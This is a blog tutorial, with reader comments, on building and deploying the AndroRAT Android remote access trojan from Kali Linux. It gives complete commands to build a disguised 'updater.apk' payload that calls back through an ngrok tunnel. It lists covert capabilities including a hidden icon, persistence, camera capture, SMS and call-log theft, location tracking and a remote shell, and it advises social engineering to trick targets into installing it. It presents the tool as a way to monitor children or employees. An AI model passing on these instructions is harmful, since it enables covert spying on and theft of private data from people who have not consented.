This blog is NOT OFFICIAL website of Kali Linux. We just share Tutorials to learn Cybersecurity.

How to Remotely Monitor any Android Device

Home

Android is the most popular mobile operating system in today's world. In today's article we are going to learn "how to monitor an Android device remotely ?" To do so we are going to use a malicious application using our Kali Linux.

Using this method parents can monitor their kids mobile devices, a company can monitor what employees doing on company provided devices. Basically, we can use this to monitor any Android device.

remotly monitor android devices

To do so we are going to use AndroRAT. The name says all about this, Andro for Android and RAT is Remote Access Tool/Trojan. AndroRAT is designed to give control of the Android system remotely and receive information from it. It is a client/server application developed in Java Android for the client side and the server side is written in Python.

AndroRAT will work on devices from Android 4.1 (Jellybean) to Android 9 (Oreo) (API 16 to API 28). This RAT also works on Android 10, but some of the interpreter commands will be unstable.

Features of AndroRAT

  • Full persistence backdoor.
  • Invisible icon after installation.
  • Lightweight apk runs 24X7 in background.
  • Uses very minimal resources, so can't be suspected.
  • Automatic start after reboot.
  • Audio and take pictures from both camera.
  • Browse call and SMS log.
  • Get current location, SIM card details, IP, MAC address of the device.

Installing & Using AndroRAT on Kali Linux

First of all we need to install Python3 on our Kali Linux system. We can do it by using following command:

sudo apt install python3 python3-pip

In the following screenshot we can see the output of the above command:

installing python3 on kali

Now we need to install and set up Java 8 (OpenJDK 8) on our system. We have shown this on a previous article.

Now we need to clone AndroRAT on our system from GitHub by using following command:

git clone https://github.com/karma9874/AndroRAT

We can see the result on the following screenshot:

cloning AndroRAT from GitHub

Now we need to move to the AndroRAT directory by using cd command:

cd AndroRAT

Then we need to install all the requirements for AndroRAT by using following command:

pip3 install -r requirements.txt
installing requirements androrat

In the above screenshot we can see the installation process of requirements. After that we need to install ngrok and set ngrok authentication token on our system, we had set it on our previous article. We need to follow that article to set ngrok on our system.

Now we can build the malicious APK file (payload), to do so we need to run following command:

python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk

In the above command we can see that we had used the androRAT.py python script and build our payload using --build flag, then we use --ngrok option because we had set up ngrok on our system (it will be easier otherwise we can use our IP address with -i flag, using ngrok we can easily start the listener). If we want then we can set an icon for the app using --icon flag following by an icon file path on our system but this payload runs on background so we are skipping this. Then we set a port for this service then we set the output file name using -o flag. The following screenshot shows the output of the above command:

building payload using androrat

In the above screenshot we can see that AndroRAT is building and signing the apk file, also we can see the output file (updater.apk) is on our Desktop. After finishing the the building process it will start the listener automatically as we can see in the following screenshot:

androrat listner

In the above screenshot we can see that AndroRAT listener is started and waiting for connection. Now we can send our apk file to a Android device by social engineering techniques and convince our target user to install it. To show a demo we are going to install the payload on our own Android tablet. We can see that we got the connection in the following screenshot:

got connected with android device using androrat
Here we can run various commands. To check the commands list given below:

  • deviceInfo                  --> returns basic info of the device
  • camList                    --> returns cameraID  
  • takepic [cameraID]           --> Takes picture from camera
  • startVideo [cameraID]        --> starts recording the video
  • stopVideo                  --> stop recording the video & show video file
  • startAudio                 --> starts recording the audio
  • stopAudio                  --> stop recording the audio
  • getSMS [inbox|sent]          --> returns inbox sms or sent sms in a file 
  • getCallLogs                --> returns call logs in a file
  • shell                      --> starts a sh shell of the device
  • vibrate [number_of_times]    --> vibrate the device number of time
  • getLocation                --> return the current location of the device
  • getIP                     --> returns the ip of the device
  • getSimDetails              --> returns the details of all sim of the device
  • clear                     --> clears the screen
  • getClipData                 --> show the current text on the clipboard
  • getMACAddress            --> returns the mac address of the device
  • exit                       --> exit the interpreter

We can run the above commands to monitor the android device. For an example we run the getSMS inbox command to see the inbox of our target. The output shown in the following screenshot:

getting sms list of an android device
In the above screenshot we can see that the SMS of victim's inbox saved on our highlighted directory.

Same way if we want to take a camera shot we need to run the camList command first then it will show the list of camera's on that device. Then we can take a snap by using takepic <number of camera> command. Shown in the following screenshot:

taking pic from back camera

We also can open the shell-prompt of target android device by using shell command. After getting the terminal of the target of the victim's device we can control the device from our Kali Linux system.

Some Extra Talks

  1. We have used ngrok services, but ngrok services are not so much stable. If we need a stable connection we need to use our static public IP address and forward our using port.
  2. If the targeted device have battery saver mode on then our payload will not get reverse connection.
  3. If our target device have Android version 11 or above then some interpreter commands may not stable.
  4. We need some great social engineering techniques to make fool our target and install the payload and after installing must need to click on "Open". After that the payload will be hidden.

Warning:- This article is written for experimental and educational purposes only. We tried this on our own devices to show the demonstrate. Hacking other's devices without proper permissions is illegal and can be considered as criminal offense. We are not responsible if anyone did anything wrong. Do the things at your own risk.

This is how we can remotely control or monitor Android devices from our Kali Linux system. This method is shown for educational purposes, it also spread cybersecurity awareness that how they hack into our systems.

Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

author-img
Kali Linux

Comments

27 comments
Post a Comment
  • AnonymousMay 4, 2022 at 5:17 PM

    How can I reconnect with that device after closing terminal ???

    Delete Comment
    • Kali Linux photo
      Kali LinuxMay 4, 2022 at 7:21 PM

      We suggest to make a persistence backdoor on the target Android device just after first connection. There are lots of articles on the internet to make this. Warning:- Please do such things on your own device. We don't support any illegal works.

      Delete Comment
      • AnonymousOctober 4, 2023 at 8:44 AM

        Did anyone find this out yet ?

        Delete Comment
      • AnonymousMay 11, 2022 at 8:42 PM

        [ERROR] pyngrok not found
        How to solve this

        Delete Comment
        • AnonymousMay 11, 2022 at 8:46 PM

          python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk
          [ERROR] pyngrok not found
          [INFO] Run pip3 install -r requirements.txt
          this error shows up
          how to solve this

          Delete Comment
          • Kali Linux photo
            Kali LinuxMay 12, 2022 at 8:12 AM

            You shows us the solution. You need to run command "pip3 install -r requirements.txt"... If you already did this then run command "pip3 install pyngrok"

            Delete Comment
            • AnonymousMay 12, 2022 at 10:43 AM

              "python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk"
              Still now working I whenever I put this above command It shows
              [ERROR] pyngrok not found
              and I also tried using this command "pip3 install pyngrok"
              It shows this
              "Requirement already satisfied: pyngrok in /usr/local/lib/python3.10/dist-packages (5.1.0)
              Requirement already satisfied: PyYAML in /usr/lib/python3/dist-packages (from pyngrok) (5.4.1)
              WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv "

              please guide me full solution

              Delete Comment
              • Kali Linux photo
                Kali LinuxMay 12, 2022 at 6:18 PM

                try "pip install pyngrok"... Then let us know again.

                Delete Comment
              • AnonymousSeptember 1, 2022 at 8:55 AM

                not working

                Delete Comment
              • AnonymousSeptember 7, 2022 at 12:20 AM

                Traceback (most recent call last):
                File "/home/kali/seeker/seeker.py", line 339, in
                clear()
                File "/home/kali/seeker/seeker.py", line 319, in clear
                with open(RESULT, 'w+'):
                PermissionError: [Errno 13] Permission denied: '/home/kali/seeker/logs/result.txt'

                Delete Comment
                • Kali Linux photo
                  Kali LinuxSeptember 7, 2022 at 10:11 PM

                  read the install log file and check why requests and packaging failed to install

                  Delete Comment
                • AnonymousSeptember 7, 2022 at 12:22 AM

                  python3 seeker.py when i use this command i see the error plz check and find my solution

                  Delete Comment
                  • AnonymousSeptember 13, 2022 at 11:02 AM

                    how to get back to the interpreter after exiting from it.
                    while running this command again "python3 androRAT.py --shell -i 0.0.0.0 -p 4444"
                    Its showing this error "[Errno 98] Address already in use"

                    So how can we get back to the same device interpreter.

                    Delete Comment
                    • AnonymousOctober 3, 2022 at 10:30 AM

                      How to connect multiple devices and monitor devices over time.

                      Delete Comment
                      • AnonymousOctober 3, 2022 at 10:39 AM

                        pip3 install -r requirements.txt
                        Defaulting to user installation because normal site-packages is not writeable
                        how to fix this arror

                        Delete Comment
                        • AnonymousOctober 7, 2022 at 12:14 PM

                          Traceback (most recent call last):
                          File "/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py", line 440, in api_request
                          response = urlopen(request, data, timeout)
                          File "/usr/lib/python3.10/urllib/request.py", line 216, in urlopen
                          return opener.open(url, data, timeout)
                          File "/usr/lib/python3.10/urllib/request.py", line 525, in open
                          response = meth(req, response)
                          File "/usr/lib/python3.10/urllib/request.py", line 634, in http_response
                          response = self.parent.error(
                          File "/usr/lib/python3.10/urllib/request.py", line 563, in error
                          return self._call_chain(*args)
                          File "/usr/lib/python3.10/urllib/request.py", line 496, in _call_chain
                          result = func(*args)
                          File "/usr/lib/python3.10/urllib/request.py", line 643, in http_error_default
                          raise HTTPError(req.full_url, code, msg, hdrs, fp)
                          urllib.error.HTTPError: HTTP Error 502: Bad Gateway

                          During handling of the above exception, another exception occurred:

                          Traceback (most recent call last):
                          File "/home/kali/Desktop/AndroRAT/androRAT.py", line 48, in
                          tcp_tunnel = ngrok.connect(port, "tcp")
                          File "/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py", line 255, in connect
                          tunnel = NgrokTunnel(api_request("{}/api/tunnels".format(api_url), method="POST", data=options,
                          File "/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py", line 461, in api_request
                          raise PyngrokNgrokHTTPError("ngrok client exception, API returned {}: {}".format(status_code, response_data),
                          pyngrok.exception.PyngrokNgrokHTTPError: ngrok client exception, API returned 502: {"error_code":103,"status_code":502,"msg":"failed to start tunnel","details":{"err":"TCP tunnels are only available after you sign up.\nSign up at: https://dashboard.ngrok.com/signup\n\nIf you have already signed up, make sure your authtoken is installed.\nYour authtoken is available on your dashboard: https://dashboard.ngrok.com/get-started/your-authtoken\r\n\r\nERR_NGROK_302\r\n"}}


                          bro plz help
                          how to fix this error

                          Delete Comment
                          • AnonymousOctober 23, 2022 at 2:05 PM

                            This error occurs due to malfunction on your ngrok.

                            Delete Comment
                          • AnonymousNovember 8, 2022 at 2:07 PM

                            how to use this app into android v12 or 13.

                            Delete Comment
                            • AnonymousDecember 11, 2022 at 1:53 PM

                              Traceback (most recent call last):
                              File "/media/asus/OS/AndroRAT/androRAT.py", line 53, in
                              build(ip,port,args.output,True,port_,icon)
                              File "/media/asus/OS/AndroRAT/utils.py", line 395, in build
                              get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
                              File "/media/asus/OS/AndroRAT/utils.py", line 342, in get_shell
                              conn.send(message_to_send.encode("UTF-8"))
                              BrokenPipeError: [Errno 32] Broken pipe

                              Delete Comment
                              • AnonymousJanuary 26, 2023 at 10:38 AM

                                hello i just have a simple Question ,, i used ip address instead of --ngrok but i don't know how to run the app in terminal after that .. can you please help me !?

                                Delete Comment
                                • AnonymousJanuary 29, 2023 at 10:06 PM

                                  That should be your external IP. It should be static (may cost extra charges, know more to contact to your ISP) to get a stable connection. Other things will be the same.

                                  Delete Comment
                                • AnonymousApril 17, 2023 at 3:43 PM

                                  i'm not able to install it on android 12 device

                                  Delete Comment
                                  • AnonymousJune 13, 2023 at 6:06 PM

                                    Brother help... Listener cannot opening after building apk....what should i do

                                    Delete Comment
                                    • AnonymousJuly 9, 2023 at 12:47 AM

                                      ┌──(code_red㉿kali)-[~/AndroRAT]
                                      └─$ python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk
                                      t=2023-07-08T15:13:02-0400 lvl=warn msg="ngrok config file found at both XDG and legacy locations, using XDG location" xdg_path=/home/code_red/.config/ngrok/ngrok.yml legacy_path=/home/code_red/.ngrok2/ngrok.yml
                                      [INFO] Tunnel_IP: 3.6.30.85 PORT: 17361
                                      [INFO] Generating APK
                                      [INFO] Building APK |
                                      Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
                                      javac: invalid flag: -jar
                                      Usage: javac
                                      use -help for a list of possible options

                                      [ERROR] Building Failed

                                      Delete Comment
                                      • AnonymousJuly 9, 2023 at 12:49 AM

                                        how to solve this error?

                                        Delete Comment
                                        • AnonymousJuly 9, 2023 at 9:47 PM

                                          It seems there are some problem with your Java. Please check it.

                                          Delete Comment
                                        google-playkhamsatmostaqltradent